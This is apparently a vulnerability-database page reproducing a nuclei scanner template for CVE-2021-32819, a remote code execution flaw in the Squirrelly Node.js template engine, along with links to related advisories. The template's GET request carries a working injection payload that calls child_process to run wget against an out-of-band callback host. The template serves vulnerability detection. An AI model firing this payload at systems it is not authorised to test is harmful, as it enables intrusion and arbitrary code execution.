Lucene search
K

Nodejs Squirrelly - Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Nodejs Squirrelly - Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Squirrelly
12 Jun 202117:09
githubexploit
Circl
CVE-2021-32819
23 Jun 202614:06
circl
CNNVD
Squirrelly 信息泄露漏洞
14 May 202100:00
cnnvd
CVE
CVE-2021-32819
14 May 202100:00
cve
Cvelist
CVE-2021-32819 Remote code execution in squirrelly
14 May 202100:00
cvelist
Github Security Blog
Insecure template handling in Squirrelly
17 May 202120:58
github
NVD
CVE-2021-32819
14 May 202119:15
nvd
OSV
GHSA-Q8J6-PWQX-PM96 Insecure template handling in Squirrelly
17 May 202120:58
osv
Prion
Remote code execution
14 May 202119:15
prion
Positive Technologies
PT-2021-19952 · Unknown +1 · Squirrelly +1
14 May 202100:00
ptsecurity
Rows per page
id: CVE-2021-32819

info:
  name: Nodejs Squirrelly - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
    - https://www.linuxlz.com/aqld/2331.html
    - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32819
    - https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-32819
    cwe-id: CWE-200,NVD-CWE-noinfo
    epss-score: 0.59844
    epss-percentile: 0.99018
    cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: squirrelly
    product: squirrelly
  tags: cve2021,cve,nodejs,rce,oast,squirrelly,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Wget"
# digest: 4a0a0047304502204762fb57d932e3340ae4da2dcf011b3f9eddc9873b1bccba3705c9ecd54dda92022100e9d61686cd3adfea6e9a6fd1b37c8f461fd7728566fdf7e34cf69322fe5bb915:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation